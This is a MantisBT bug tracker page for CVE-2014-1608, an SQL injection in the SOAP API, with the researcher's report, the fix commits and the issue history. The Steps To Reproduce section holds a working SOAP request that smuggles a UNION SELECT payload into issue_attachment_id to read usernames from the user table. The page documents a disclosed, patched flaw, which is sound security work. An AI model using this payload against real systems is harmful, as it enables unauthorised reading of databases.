MantisBT

View Issue Details Jump to Notes ] Wiki ] Related Changesets ] Issue History ] Print ]
IDProjectCategoryView StatusDate SubmittedLast Update
0016879mantisbtsecuritypublic2014-01-24 10:262014-02-07 18:24
Reporterdregad 
Assigned Todregad 
PriorityimmediateSeveritymajorReproducibilityhave not tried
StatusclosedResolutionfixed 
PlatformOSOS Version
Product Version1.1.0a4 
Target Version1.2.16Fixed in Version1.2.16 
Summary0016879: CVE-2014-1608: soap:Envelope SQL injection attack
DescriptionThe SOAP API can be used for SQL injection attacks.

Pasting relevant extracts of the original e-mail report below

-----------------

The xml sent to the soap webservice is sometimes validated, sometimes not. This
is independend from the php.ini and seems to be dependent on the php binary.
The php binaries on the different systems (I used the thoughtpolice images)
differ in the libxml2 version. But I am not quite sure this is the reason.

It is definitely still an issue, but it's not 100% sure whether the
responsibility is 100% at mantisbt.org

the XML request cannot be issued without a user account. The request allows
to read the contents of the entire mantis database no matter what the user's
access permissions are. Mantis often is used with many projects and has a
fine-grain permission structure.
Steps To ReproduceIf you would like to reproduce the issue, you could issue the following
request to a current mantis system (1.2.15) mybe on a recent CentOS image
from thoughtpolice (http://sourceforge.net/projects/thoughtpolicevm/ [^]). This
example uses the administrator account, because it is enabled by default...

<?xml version="1.0" encoding="utf-8"?><soap:Envelope
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" [^]
xmlns:xsd="http://www.w3.org/2001/XMLSchema" [^]
xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><mc_issue_attachment_get [^]
xmlns="http://futureware.biz/mantisconnect"><username>administrator</username><password>root</password><issue_attachment_id>' [^]
UNION SELECT 927,3358,1337,313373,1,1,1,1,1,username,23,42 FROM
mantis_user_table WHERE mantis_user_table.id=1 ORDER BY
bug_id,'true</issue_attachment_id></mc_issue_attachment_get></soap:Body></soap:Envelope>

This request selects the username from mantis_user_table with id=1. The
output is base64-encoded.
Additional InformationThis issue was initially discovered and reported by e-mail by Andrea Barisani from oCERT, on behalf of Martin Herfurt <martin.herfurt@nruns.com>, a security researcher at n.runs professionals GmbH (https://www.nruns.com [^]), who discovered the issue during an audit at a customer's site on an up-to-date machine with the latest Mantis version (1.2.15).
TagsNo tags attached.
Attached Files

- Relationships
related to 0016880closeddregad CVE-2014-1609: SQL injection vulnerabilities 
related to 0016898resolveddregad Dropping deprecated database API function db_query() 

-  Notes
User avatar (0039161)
dregad (developer)
2014-01-24 10:28

grangeway quickly identified the root cause and provided a fix for the issue [1]

[1] https://github.com/grangeway/mantisbt/commit/b930f0e44481439ca5bca6b438e55641d139f7e2 [^]

- Related Changesets
MantisBT: master-1.2.x 00b4c170
Timestamp: 2014-01-17 16:24:29
Author: Paul Richards
Committer: dregad
Details ] Diff ]
Fix CVE-2014-1608: mc_issue_attachment_get SQL injection

Use of db_query() instead of db_query_bound() allowed SQL injection
attacks due to unsanitized use of parameters within the query when using
the SOAP API mc_issue_attachment_get.

This issue was reported by e-mail by Andrea Barisani from oCERT, on
behalf of Martin Herfurt <martin.herfurt@nruns.com>, a security
researcher at n.runs professionals GmbH, who discovered the issue
during an audit at a customer's site.

Fixes 0016879

Signed-off-by: Damien Regad <dregad@mantisbt.org>

Conflicts:
    api/soap/mc_file_api.php
mod - api/soap/mc_file_api.php Diff ] File ]
MantisBT: master 3be86ce3
Timestamp: 2014-01-17 16:24:29
Author: Paul Richards
Committer: dregad
Details ] Diff ]
Fix CVE-2014-1608: mc_issue_attachment_get SQL injection

Use of db_query() instead of db_query_bound() allowed SQL injection
attacks due to unsanitized use of parameters within the query when using
the SOAP API mc_issue_attachment_get.

This issue was reported by e-mail by Andrea Barisani from oCERT, on
behalf of Martin Herfurt <martin.herfurt@nruns.com>, a security
researcher at n.runs professionals GmbH, who discovered the issue
during an audit at a customer's site.

Fixes 0016879

Signed-off-by: Damien Regad <dregad@mantisbt.org>
mod - api/soap/mc_file_api.php Diff ] File ]

- Issue History
Date Modified Username Field Change
2014-01-24 10:26 dregad New Issue
2014-01-24 10:28 dregad Note Added: 0039161
2014-01-24 10:28 dregad Assigned To => grangeway
2014-01-24 10:28 dregad Status new => confirmed
2014-01-24 10:32 dregad Relationship added related to 0016880
2014-01-24 11:36 dregad Status confirmed => assigned
2014-01-24 11:36 dregad Product Version 1.2.15 => 1.1.0a4
2014-01-24 18:52 dregad Changeset attached => MantisBT master-1.2.x 00b4c170
2014-01-24 18:52 dregad Assigned To grangeway => dregad
2014-01-24 18:52 dregad Status assigned => resolved
2014-01-24 18:52 dregad Resolution open => fixed
2014-01-24 18:52 dregad Fixed in Version => 1.2.16
2014-01-24 18:52 dregad Changeset attached => MantisBT master 3be86ce3
2014-01-28 05:39 dregad Relationship added related to 0016898
2014-02-07 18:21 dregad View Status private => public
2014-02-07 18:24 dregad Status resolved => closed


MantisBT 1.2.17 [^]
Copyright © 2000 - 2014 MantisBT Team
Time: 0.1043 seconds.
memory usage: 3,035 KB
Powered by Mantis Bugtracker